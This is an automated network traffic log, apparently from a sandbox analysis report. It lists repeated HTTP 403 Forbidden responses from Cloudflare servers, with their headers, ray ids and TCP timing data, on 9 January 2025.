Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Thu, 09 Jan 2025 07:36:27 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeCache-Control: max-age=15Expires: Thu, 09 Jan 2025 07:36:42 GMTReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=jppclza67N0UhK76vXgiteG6ssfiVUGxVjv%2BNLP%2Ffcm%2BpXRYeZVGIlYPjTUT8wvlIp%2BFHpVYIUdsGDtFLGgcTMnNHzdtUORqC%2BaSMD9Zd9pLdV3F9jNiPnPjNfE2WW%2F0RJQ2G8K0fxqh%2Fv0U"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}expect-ct: max-age=86400, enforcereferrer-policy: same-originx-content-type-options: nosniffx-frame-options: SAMEORIGINx-xss-protection: 1; mode=blockServer: cloudflareCF-RAY: 8ff2c1a6ce9f43d6-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1563&min_rtt=1560&rtt_var=592&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2854&recv_bytes=704&delivery_rate=1838790&cwnd=248&unsent_bytes=0&cid=f20f6b5a36a8b974&ts=147&x=0"
Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Thu, 09 Jan 2025 07:36:28 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeCache-Control: max-age=15Expires: Thu, 09 Jan 2025 07:36:43 GMTReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=4wtAO0wHkF3OUwC1FPN0JB5Y3%2F7Qj0tQFr1EGxZuI%2Fjcxja0ss4wjfWg4WGXMZPH0YmTNrqE%2BIXCq4ywV%2FPDH8IqzyDTRSwZ6NeeFCua20G6e0JZEchLXCxJSiy7iyCiBdVa17hc28YyCP8v"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}expect-ct: max-age=86400, enforcereferrer-policy: same-originx-content-type-options: nosniffx-frame-options: SAMEORIGINx-xss-protection: 1; mode=blockServer: cloudflareCF-RAY: 8ff2c1aa9e888c23-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=2037&min_rtt=2027&rtt_var=781&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2854&recv_bytes=704&delivery_rate=1381921&cwnd=227&unsent_bytes=0&cid=7e1958ff15c187cd&ts=148&x=0"
Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Thu, 09 Jan 2025 07:36:29 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeCache-Control: max-age=15Expires: Thu, 09 Jan 2025 07:36:44 GMTReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=M1Grb%2Bslb%2BnldRUTawUZQ0YVmYPBelGquTqOUuHcMT%2FFwPT6JBAgfqFiKusj9ppdnochfQ7qaMse50XXWMIgIQp3NxpkhlTi%2Btxbz%2FWzTkwNHkvmlV6UBfTVXJrtYMCt00qSqIoai%2Bq5Gcw2"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}expect-ct: max-age=86400, enforcereferrer-policy: same-originx-content-type-options: nosniffx-frame-options: SAMEORIGINx-xss-protection: 1; mode=blockServer: cloudflareCF-RAY: 8ff2c1ae4e5642ad-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1689&min_rtt=1682&rtt_var=635&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2854&recv_bytes=704&delivery_rate=1736028&cwnd=242&unsent_bytes=0&cid=fd3fb67b41ff6462&ts=135&x=0"
Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Thu, 09 Jan 2025 07:36:29 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeCache-Control: max-age=15Expires: Thu, 09 Jan 2025 07:36:44 GMTReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=GuFsGVOGsxA1TRE7QIwWZEqKF9NKOwbvZ3Ykk%2Bx7auhTUU7VgFg6wVZmrSjq%2Bpwd%2BIu13zSX9IgsuB1lkj%2Ba2di48hEWduU6lpUuSKZiCfWitmFcA3Kf7nLouz7BKTr%2F8kAoQ1GDdlTQ4eqA"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}expect-ct: max-age=86400, enforcereferrer-policy: same-originx-content-type-options: nosniffx-frame-options: SAMEORIGINx-xss-protection: 1; mode=blockServer: cloudflareCF-RAY: 8ff2c1b23b89de98-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1563&min_rtt=1556&rtt_var=598&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2854&recv_bytes=704&delivery_rate=1809169&cwnd=212&unsent_bytes=0&cid=a0489213f3b096dd&ts=143&x=0"
Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Thu, 09 Jan 2025 07:36:30 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeCache-Control: max-age=15Expires: Thu, 09 Jan 2025 07:36:45 GMTReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Cb4qUUZrcytXe%2Fia%2F9U6Zf6s1ytT87DyuqN6UyobWiC0J8WUWFjb9%2B%2B6stQQOFHr%2BTIcvJ3YrFMsH4OMdZTkHE5mi4y07cp6Y2AxQrrIBgza%2BTn68KkIBHILMD6p4ZwOVlh1Y26I3Hy6tsEL"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}expect-ct: max-age=86400, enforcereferrer-policy: same-originx-content-type-options: nosniffx-frame-options: SAMEORIGINx-xss-protection: 1; mode=blockServer: cloudflareCF-RAY: 8ff2c1b5edc68c6c-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=2040&min_rtt=1992&rtt_var=781&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2853&recv_bytes=704&delivery_rate=1465863&cwnd=168&unsent_bytes=0&cid=5806be8d7b03f785&ts=151&x=0"
Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Thu, 09 Jan 2025 07:36:31 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeCache-Control: max-age=15Expires: Thu, 09 Jan 2025 07:36:46 GMTReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Z5oXetgOG%2FA0FxhMx%2B3LyfonEULRw%2Breum2fmHB16EDKzxroj3PlQE7HTTHg9J17%2BzRN0V7FFHKWtMWStgjibBCVBKh8%2F6Xj%2BSPi050w%2FOOPUMnvUG3hFgjwqLOUfjmXSljJK3dCJjMZQtda"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}expect-ct: max-age=86400, enforcereferrer-policy: same-originx-content-type-options: nosniffx-frame-options: SAMEORIGINx-xss-protection: 1; mode=blockServer: cloudflareCF-RAY: 8ff2c1b9bbe10f47-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1476&min_rtt=1467&rtt_var=570&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2854&recv_bytes=704&delivery_rate=1888745&cwnd=226&unsent_bytes=0&cid=def017bf4562dd44&ts=143&x=0"
Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Thu, 09 Jan 2025 07:36:31 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeCache-Control: max-age=15Expires: Thu, 09 Jan 2025 07:36:46 GMTReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=kWQzCs2OqYvFfCYbyLrMzka5pBhx9qHMO0u%2FXJyBwoWe2uckhhXuia9u%2BgL0WgNq9s%2FJq0hQ89ShhVnTRf8RUUdabJSjR500EbnzxHwDYtDzjPE1LR8uZ3aiaAGIBJZryVmXkcbOXPx3P9Ig"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}expect-ct: max-age=86400, enforcereferrer-policy: same-originx-content-type-options: nosniffx-frame-options: SAMEORIGINx-xss-protection: 1; mode=blockServer: cloudflareCF-RAY: 8ff2c1bd7bcf1a2c-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1995&min_rtt=1986&rtt_var=764&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2853&recv_bytes=704&delivery_rate=1414728&cwnd=174&unsent_bytes=0&cid=0ff1f16783a8c1cc&ts=123&x=0"
Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Thu, 09 Jan 2025 07:36:32 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeCache-Control: max-age=15Expires: Thu, 09 Jan 2025 07:36:47 GMTReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=4FZlPZWGQavYyFfwwfq7plZtu8JByrqRAptXZg8XovJFv7PKlfgSKHzvDUeKKnGvXj6tyAoRb0HdWrxM3CkrkttY87uMBNnHhkKjUn9xXYAjJfB%2BwCS2m38ikFNcHRPW%2BVGx8HUJ5ANnAMqX"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}expect-ct: max-age=86400, enforcereferrer-policy: same-originx-content-type-options: nosniffx-frame-options: SAMEORIGINx-xss-protection: 1; mode=blockServer: cloudflareCF-RAY: 8ff2c1c15d537cee-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1982&min_rtt=1951&rtt_var=754&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2854&recv_bytes=704&delivery_rate=1496668&cwnd=176&unsent_bytes=0&cid=eeea8ab5be1630c9&ts=134&x=0"
Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Thu, 09 Jan 2025 07:36:32 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeCache-Control: max-age=15Expires: Thu, 09 Jan 2025 07:36:47 GMTReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=x7LfVvm2wLzhWS9jow9wMXP%2FV4vL6lhf12SaunqtJ5sw2PQUf%2BapdatrDs6Aw9OT12bbi42O6k2%2F8FyN3%2FhvSwNV07D%2BF6gYUXEeTTedRv2MBICTh8fYkaRHbC%2BF7BzTYwInJjvNGBkOVYsY"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}expect-ct: max-age=86400, enforcereferrer-policy: same-originx-content-type-options: nosniffx-frame-options: SAMEORIGINx-xss-protection: 1; mode=blockServer: cloudflareCF-RAY: 8ff2c1c53a4241e1-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1852&min_rtt=1846&rtt_var=704&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2855&recv_bytes=704&delivery_rate=1541710&cwnd=243&unsent_bytes=0&cid=59c060b42c192408&ts=148&x=0"
Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Thu, 09 Jan 2025 07:36:33 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeCache-Control: max-age=15Expires: Thu, 09 Jan 2025 07:36:48 GMTReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=UfKisX2fvF%2FnW8douKIDZJVu0LaDoDYyOyAmKRj%2FQALFmDezle6PqA%2FLK0kFfNe61hx9LTSkUuAZIvbGAuPMtuOniT4kEhw9azvh7i6r68Vv5gyXopaEcVp7diL3wdFOyJzHgN61hRdeiSiU"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}expect-ct: max-age=86400, enforcereferrer-policy: same-originx-content-type-options: nosniffx-frame-options: SAMEORIGINx-xss-protection: 1; mode=blockServer: cloudflareCF-RAY: 8ff2c1c90d174399-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1568&min_rtt=1558&rtt_var=605&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2853&recv_bytes=704&delivery_rate=1777236&cwnd=225&unsent_bytes=0&cid=7a36d42e7e488c51&ts=148&x=0"
Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Thu, 09 Jan 2025 07:36:34 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeCache-Control: max-age=15Expires: Thu, 09 Jan 2025 07:36:49 GMTReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=97%2BXx10B%2FVHfN4nlsyLtwBPkDg%2BeUDCimhyZTMXDy2fieJY9c0P%2FXdaWolMgNjnUplXhyDWhA2ce%2FYCzlpeiAqB3MwEa35HhS5WU1qaueYNNUjpaHyV3JB8z8r98%2B5kUsEdQgSvh%2BXBODfjz"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}expect-ct: max-age=86400, enforcereferrer-policy: same-originx-content-type-options: nosniffx-frame-options: SAMEORIGINx-xss-protection: 1; mode=blockServer: cloudflareCF-RAY: 8ff2c1ccd8f0421c-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=2138&min_rtt=2133&rtt_var=811&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2854&recv_bytes=704&delivery_rate=1340679&cwnd=252&unsent_bytes=0&cid=1f6bdb268c8b2e87&ts=155&x=0"
Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Thu, 09 Jan 2025 07:36:34 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeCache-Control: max-age=15Expires: Thu, 09 Jan 2025 07:36:49 GMTReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Wotu1pUcW18qWVuRcgcVf0fmt4GruJwMOqxBPy05%2BGFBukFiptToy6BB6UrCgorlg1G93ZjNP8OpeXUABD%2FCZ5geHrsTo9lm2h3g4TOQmp081x%2BKdHS6EWnyPLsuHRMxY60CKqHNmmJ6xMTt"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}expect-ct: max-age=86400, enforcereferrer-policy: same-originx-content-type-options: nosniffx-frame-options: SAMEORIGINx-xss-protection: 1; mode=blockServer: cloudflareCF-RAY: 8ff2c1d0993a0f77-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1633&min_rtt=1629&rtt_var=619&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2855&recv_bytes=704&delivery_rate=1757977&cwnd=231&unsent_bytes=0&cid=a6bc217107578799&ts=127&x=0"
Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Thu, 09 Jan 2025 07:36:35 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeCache-Control: max-age=15Expires: Thu, 09 Jan 2025 07:36:50 GMTReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ATrheb7kFK28JY3TWxFr01gLP6QbAn5JEoTL4pUia9%2BCtf1hdo1sy4u%2FI83vQjb%2B4w6bSX9Z5uD8TJxXDs6SYCrLPJ6w5TlZVv3bN3p0%2F7vyENWki5%2FEMUnFOzJO96TmGLR3lgXK8bdCNpAO"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}expect-ct: max-age=86400, enforcereferrer-policy: same-originx-content-type-options: nosniffx-frame-options: SAMEORIGINx-xss-protection: 1; mode=blockServer: cloudflareCF-RAY: 8ff2c1d47809c34d-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1528&min_rtt=1521&rtt_var=585&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2855&recv_bytes=704&delivery_rate=1849271&cwnd=252&unsent_bytes=0&cid=ce018c7b5b5829ba&ts=129&x=0"
Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Thu, 09 Jan 2025 07:36:35 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeCache-Control: max-age=15Expires: Thu, 09 Jan 2025 07:36:50 GMTReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=lJg3I01bNrQhos8uBsvpPozBRaIo%2BF15Bo9BYZeBf1jMINxzo%2BFIbD%2FsAmuMZIlpZt6s5n9XfKG3ItsYUfTssKcinLToZiaxRDbCzO%2FKICNYWAOdVg7HcJk0nB2KHgyEJa%2BjqN4Xnd%2Ba5Loj"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}expect-ct: max-age=86400, enforcereferrer-policy: same-originx-content-type-options: nosniffx-frame-options: SAMEORIGINx-xss-protection: 1; mode=blockServer: cloudflareCF-RAY: 8ff2c1d83d604299-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1705&min_rtt=1688&rtt_var=668&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2854&recv_bytes=704&delivery_rate=1597374&cwnd=251&unsent_bytes=0&cid=178c0f5b77ecb4ac&ts=128&x=0"
Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Thu, 09 Jan 2025 07:36:36 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeCache-Control: max-age=15Expires: Thu, 09 Jan 2025 07:36:51 GMTReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=bcXqv3ZyV3dlr3juN2%2BqCaMVDe8zRKvEivMNn7W5X9PDHPAk%2FoG0EHkR4Fo7aQW5Ia%2BiWv0cPyCQCmb2xosIdfnRSCFUmnwbR3mFjsR1lIRN4UYSfK5NPf9ZYHPENBJmsrK9JMRG8%2BtrSmDq"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}expect-ct: max-age=86400, enforcereferrer-policy: same-originx-content-type-options: nosniffx-frame-options: SAMEORIGINx-xss-protection: 1; mode=blockServer: cloudflareCF-RAY: 8ff2c1dbeb4843f7-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1563&min_rtt=1557&rtt_var=597&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2855&recv_bytes=704&delivery_rate=1811414&cwnd=213&unsent_bytes=0&cid=349b12b47c9c152d&ts=134&x=0"
Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Thu, 09 Jan 2025 07:36:37 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeCache-Control: max-age=15Expires: Thu, 09 Jan 2025 07:36:52 GMTReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=E0pwhwXiPUVPE0hygfxX8d0lFKQK2jMOmrEbUtG%2Fnerg3Muiojdbx5%2BKYXXA1XsP9wyWQdIpNXTIT%2BJxTtlwOJoVXA4peNPg7AAK5n2jkcAjvQqUmwaK%2FISPrc%2BNvoxhXI9wH0jSuaPfPVAT"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}expect-ct: max-age=86400, enforcereferrer-policy: same-originx-content-type-options: nosniffx-frame-options: SAMEORIGINx-xss-protection: 1; mode=blockServer: cloudflareCF-RAY: 8ff2c1dfbd484252-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=2214&min_rtt=2197&rtt_var=859&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2853&recv_bytes=704&delivery_rate=1248930&cwnd=235&unsent_bytes=0&cid=f93b64e0830bdbb9&ts=144&x=0"
Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Thu, 09 Jan 2025 07:36:37 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeCache-Control: max-age=15Expires: Thu, 09 Jan 2025 07:36:52 GMTReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=9yj%2FX4asUQ8F14i%2BTleiMs5W4PNiCr7hfqhOI9DN5NYhN7F08aZdDn4UhbVxdf2AZMOa4740V6hgXTruJ%2F9BiLLDNNa6MYhvfLHAx%2BkHf4cdKLn%2FuiJQTWC4CMStWWWA6Gb2vs0ooTo3374p"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}expect-ct: max-age=86400, enforcereferrer-policy: same-originx-content-type-options: nosniffx-frame-options: SAMEORIGINx-xss-protection: 1; mode=blockServer: cloudflareCF-RAY: 8ff2c1e3a980c466-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1589&min_rtt=1584&rtt_var=605&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2854&recv_bytes=704&delivery_rate=1791411&cwnd=219&unsent_bytes=0&cid=4f3793f1bbd91e9d&ts=146&x=0"
Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Thu, 09 Jan 2025 07:36:38 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeCache-Control: max-age=15Expires: Thu, 09 Jan 2025 07:36:53 GMTReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=FMESUcIAM0Q%2B5w%2BY%2F02zQBDA3KvxVdts1EPnX8xO082g%2FTxlJxm6w%2BgMm9ZeAswKfY3U3njcEdN6BtLPjb8na8XoIVM%2F7skr%2FnjCwiOkn08rgKA4GL49PvKpbPFqHKu5JcMF%2BxejMTsEXs2I"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}expect-ct: max-age=86400, enforcereferrer-policy: same-originx-content-type-options: nosniffx-frame-options: SAMEORIGINx-xss-protection: 1; mode=blockServer: cloudflareCF-RAY: 8ff2c1e75aba8cb7-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1969&min_rtt=1967&rtt_var=743&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2854&recv_bytes=704&delivery_rate=1467336&cwnd=168&unsent_bytes=0&cid=d31439cf28976967&ts=133&x=0"
Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Thu, 09 Jan 2025 07:36:38 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeCache-Control: max-age=15Expires: Thu, 09 Jan 2025 07:36:53 GMTReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=izzGUI3WYNVri8Y0yTngcWk3LFQVLwxSUbcwyrMXAf2tZFvb%2BnhViqEQrXzq3e2SiWX4C94NTkUp0HtOfhF1aAucPoHdOiGBrLjEAhKJudKpAzKrd194Ut84JhbzGrSpWo4fOiyEmyiiQvhT"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}expect-ct: max-age=86400, enforcereferrer-policy: same-originx-content-type-options: nosniffx-frame-options: SAMEORIGINx-xss-protection: 1; mode=blockServer: cloudflareCF-RAY: 8ff2c1eb0b02efa3-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=2041&min_rtt=2013&rtt_var=775&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2853&recv_bytes=704&delivery_rate=1450571&cwnd=122&unsent_bytes=0&cid=88453ffa7733e33f&ts=137&x=0"
Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Thu, 09 Jan 2025 07:36:39 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeCache-Control: max-age=15Expires: Thu, 09 Jan 2025 07:36:54 GMTReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=foTmgvRmt%2BlxwIaH4fEYCSZVqkXcMdQNT8Zay%2F1zFHM78tQEeZ4pNHgIkRHGKZEaida%2BeHl%2BGZl6j4nrBk2%2BUMfLoja00omiQxYQFeFPlMhE%2BuUKB%2BwrhCOXEksdO8R6pOSM7TEo7k0mDJj0"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}expect-ct: max-age=86400, enforcereferrer-policy: same-originx-content-type-options: nosniffx-frame-options: SAMEORIGINx-xss-protection: 1; mode=blockServer: cloudflareCF-RAY: 8ff2c1eecdd772a1-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=2027&min_rtt=2018&rtt_var=763&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2853&recv_bytes=704&delivery_rate=1446977&cwnd=194&unsent_bytes=0&cid=d9fe7a255fdee34d&ts=147&x=0"
Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Thu, 09 Jan 2025 07:36:40 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeCache-Control: max-age=15Expires: Thu, 09 Jan 2025 07:36:55 GMTReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ysfXbX06mIy7k3IUKsizpDfRG2ZZPRaAzjedyj1lYf8f0ihXV2KgAUsnsaLC%2B0u0ozZ3mxrTTHQ1hU%2BvNpSJ2L%2FUjzjnalectqbJssB77XJI3HQaH0my7qXrtcr6nE60jJ%2FEYcB2naWrNFaz"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}expect-ct: max-age=86400, enforcereferrer-policy: same-originx-content-type-options: nosniffx-frame-options: SAMEORIGINx-xss-protection: 1; mode=blockServer: cloudflareCF-RAY: 8ff2c1f28e0543ff-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1692&min_rtt=1680&rtt_var=655&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2853&recv_bytes=704&delivery_rate=1640449&cwnd=216&unsent_bytes=0&cid=073aa9e57cb669fb&ts=152&x=0"
Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Thu, 09 Jan 2025 07:36:40 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeCache-Control: max-age=15Expires: Thu, 09 Jan 2025 07:36:55 GMTReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=wn0x7zuEUt%2BJcW%2FD21O5rPz18uVV85ZYCJBcd1gVGb4cXtlEpKiEmbQOj%2B9F%2BTlA0rsBNMD5UqETwXyt3S%2BOnmW5WVRcsjVRq%2Fj0AonrZQDqgqSGNTSzsup9HINjwLnSi9VeBXX%2B1aIspiIT"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}expect-ct: max-age=86400, enforcereferrer-policy: same-originx-content-type-options: nosniffx-frame-options: SAMEORIGINx-xss-protection: 1; mode=blockServer: cloudflareCF-RAY: 8ff2c1f69c7d7cee-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1967&min_rtt=1965&rtt_var=738&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2853&recv_bytes=704&delivery_rate=1486005&cwnd=176&unsent_bytes=0&cid=8598f7b38ae909dd&ts=153&x=0"
Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Thu, 09 Jan 2025 07:36:41 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeCache-Control: max-age=15Expires: Thu, 09 Jan 2025 07:36:56 GMTReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=q4Fvjl4CiGcL3QfE3PyhuP3rD0uDV9sgUkJHidiBMWRzHRqQqt7OaQtPkVYvHrVKYAUAPlYGaO7RmZkdiGi24u21iTczxM5%2FpysnzrXtS1DVztNR24anIef9yZPYX6FByq3jWsCOjxYxCr6d"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}expect-ct: max-age=86400, enforcereferrer-policy: same-originx-content-type-options: nosniffx-frame-options: SAMEORIGINx-xss-protection: 1; mode=blockServer: cloudflareCF-RAY: 8ff2c1fa993042cb-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1682&min_rtt=1674&rtt_var=644&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2853&recv_bytes=704&delivery_rate=1679125&cwnd=163&unsent_bytes=0&cid=713b6062e51ee2d5&ts=148&x=0"
